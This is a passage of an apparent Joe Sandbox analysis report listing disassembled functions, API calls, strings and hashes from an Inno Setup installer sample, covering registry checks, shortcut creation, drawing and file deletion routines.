                                                                                                      • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458489
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                                                      • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                                      • API String ID: 4012871263-351310198
                                                                                                      • Opcode ID: cc7ad6ccf5233eaebe813f6a5333062681ccb791baa3dad4f168156cebafbadf
                                                                                                      • Instruction ID: 29107a7cf73729034b65a1fcaaf08eab05738b19563c620e852bf3134b102344
                                                                                                      • Opcode Fuzzy Hash: cc7ad6ccf5233eaebe813f6a5333062681ccb791baa3dad4f168156cebafbadf
                                                                                                      • Instruction Fuzzy Hash: 46914170A002099BDB10EFA9C845B9EB7B4EB05305F50856FED14FB283DF7899498F69
                                                                                                      Function 0041CA1C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • 73A0A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                                                      • 73A14C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                                                      • 73A16180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                                                      • 73A14C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                                                      • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                                                      • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                                                      • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                                                      • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                                                      • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                                                      • 73A14C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                                                      • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                                                      • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                                                      • 73A08830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                                                      • 73A022A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                                                      • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                                                      • 73A14D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                                        • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$ObjectSelect$A022A08830Text$A16180A570DeleteFillRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 2377543522-0
                                                                                                      • Opcode ID: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                                                                      • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                                                      • Opcode Fuzzy Hash: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                                                                      • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                                                      Function 00497DA0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 251synchronizationCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ShowWindow.USER32(?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000,004984F9,?,00000000), ref: 00497E23
                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000), ref: 00497E36
                                                                                                      • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000), ref: 00497E46
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00497E67
                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000), ref: 00497E77
                                                                                                        • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                      • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                                      • API String ID: 2000705611-3672972446
                                                                                                      • Opcode ID: 082597774f549eda738f03d74d98f9d52f67cfbc56a945ed8bd031ee0c63b3f6
                                                                                                      • Instruction ID: d71e95358f961f9c8085103628ed7ebfe7aaf39cab9d6a0a027eda6f41515cae
                                                                                                      • Opcode Fuzzy Hash: 082597774f549eda738f03d74d98f9d52f67cfbc56a945ed8bd031ee0c63b3f6
                                                                                                      • Instruction Fuzzy Hash: C291B530A042449FDF11EBA9DC52BAE7FA4EF4A304F51447BF500AB292DA7DAC05CB59
                                                                                                      Function 0045AA3C Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,0045ACF8,?,?,?,?,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045ABAA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                      • API String ID: 1452528299-3112430753
                                                                                                      • Opcode ID: c66920e5c30c99cf277918279cba3cc6becf5feca79c3c8df3d973bfdf2d3f66
                                                                                                      • Instruction ID: f5e388fb48f96f1c0466849e1c52bdf0d536658550fb6e74c3a20cf80cd44526
                                                                                                      • Opcode Fuzzy Hash: c66920e5c30c99cf277918279cba3cc6becf5feca79c3c8df3d973bfdf2d3f66
                                                                                                      • Instruction Fuzzy Hash: 2271AE707002445BDB01EB69D8427AE77A6AF48316F50856BFC01DB383CA7C9A5DC79A
                                                                                                      Function 0045CF24 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32 ref: 0045CF3E
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CF5E
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CF6B
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CF78
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CF86
                                                                                                        • Part of subcall function 0045CE2C: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CECB,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CEA5
                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D03F
                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D048
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                                      • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                                      • API String ID: 59345061-4263478283
                                                                                                      • Opcode ID: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
                                                                                                      • Instruction ID: 4ce31bb81caf279f5ed3d10c62bb09a2aad5f6c7ba3f26a8019cd68bbbdcec0a
                                                                                                      • Opcode Fuzzy Hash: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
                                                                                                      • Instruction Fuzzy Hash: E95193B1D00608EFDB10DFA9C845BAEBBB8EF48315F14806AF915B7381C2389945CF69
                                                                                                      Function 00456550 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 282comCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,0045688D), ref: 00456592
                                                                                                      • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,0045688D), ref: 004565B8
                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00456745
                                                                                                      Strings
                                                                                                      • IPersistFile::Save, xrefs: 00456814
                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 0045672A
                                                                                                      • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 004567B6
                                                                                                      • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004566A7
                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566DB
                                                                                                      • CoCreateInstance, xrefs: 004565C3
                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 0045677C
                                                                                                      • IPropertyStore::Commit, xrefs: 00456795
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateInstance$FreeString
                                                                                                      • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                                                      • API String ID: 308859552-3936712486
                                                                                                      • Opcode ID: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
                                                                                                      • Instruction ID: c99fdec92309fd26656a6f7ea9bd91ecf5cc306c054acb75a5569a06f28a4b2e
                                                                                                      • Opcode Fuzzy Hash: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
                                                                                                      • Instruction Fuzzy Hash: 29A13E71A00104AFDB50EFA9C885B9E7BF8EF09706F55406AF804E7252DB38DD48CB69
                                                                                                      Function 0041B3BC Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • 73A14C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                                                      • 73A14C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                                                      • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                                                      • 73A16180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                                                      • 73A0A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                                                      • 73A14C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                                                      • 73A0A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                                      • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$Select$Delete$A16180A480A570Stretch
                                                                                                      • String ID:
                                                                                                      • API String ID: 3135053572-0
                                                                                                      • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                                      • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                                                      • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                                      • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                                                      Function 00472DB8 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 337COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472F70
                                                                                                      • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00473077
                                                                                                      • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0047308D
                                                                                                      • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 004730B2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                                      • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                                      • API String ID: 971782779-3668018701
                                                                                                      • Opcode ID: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                                                                      • Instruction ID: 1ded2309c22d90a9957aabde76cedeacc99048359e90752decbb9b8a0015ab1b
                                                                                                      • Opcode Fuzzy Hash: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                                                                      • Instruction Fuzzy Hash: 8FD12574A00149AFDB01EFA9D581BDDBBF5AF08305F50806AF804B7392D778AE45CB69
                                                                                                      Function 00454860 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,?,00000000,?,00000000,00454AF9,?,0045AECE,00000003,00000000,00000000,00454B30), ref: 00454979
                                                                                                        • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                                      • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 004549FD
                                                                                                      • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 00454A2C
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454897
                                                                                                      • RegOpenKeyEx, xrefs: 004548FC
                                                                                                      • , xrefs: 004548EA
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548D0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue$FormatMessageOpen
                                                                                                      • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                      • API String ID: 2812809588-1577016196
                                                                                                      • Opcode ID: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
                                                                                                      • Instruction ID: 44bd6ba1492406805f437c97fe518088f2f8e7c1bef0b67c8a01139b77ca8c69
                                                                                                      • Opcode Fuzzy Hash: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
                                                                                                      • Instruction Fuzzy Hash: C0911471944248ABDB10DFE5D942BDEB7FCEB48309F50406BF900FB282D6789E458B69
                                                                                                      Function 004597BC Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 004596C8: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459863
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 004598CD
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459934
                                                                                                      Strings
                                                                                                      • v4.0.30319, xrefs: 00459855
                                                                                                      • .NET Framework not found, xrefs: 00459981
                                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00459816
                                                                                                      • .NET Framework version %s not found, xrefs: 0045996D
                                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004598E7
                                                                                                      • v2.0.50727, xrefs: 004598BF
                                                                                                      • v1.1.4322, xrefs: 00459926
                                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00459880
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$Open
                                                                                                      • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                      • API String ID: 2976201327-446240816
                                                                                                      • Opcode ID: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
                                                                                                      • Instruction ID: 729b419896cd5506e065475e0ee5015c208a67e93f4f54458093df2d8724af3d
                                                                                                      • Opcode Fuzzy Hash: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
                                                                                                      • Instruction Fuzzy Hash: 0051A030A04145EBCB04DFA9C8A1BEE77B69B59305F54447FA841DB393D63D9E0E8B18
                                                                                                      Function 00458DA8 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00458DDF
                                                                                                      • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458DFB
                                                                                                      • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458E09
                                                                                                      • GetExitCodeProcess.KERNEL32(?), ref: 00458E1A
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E61
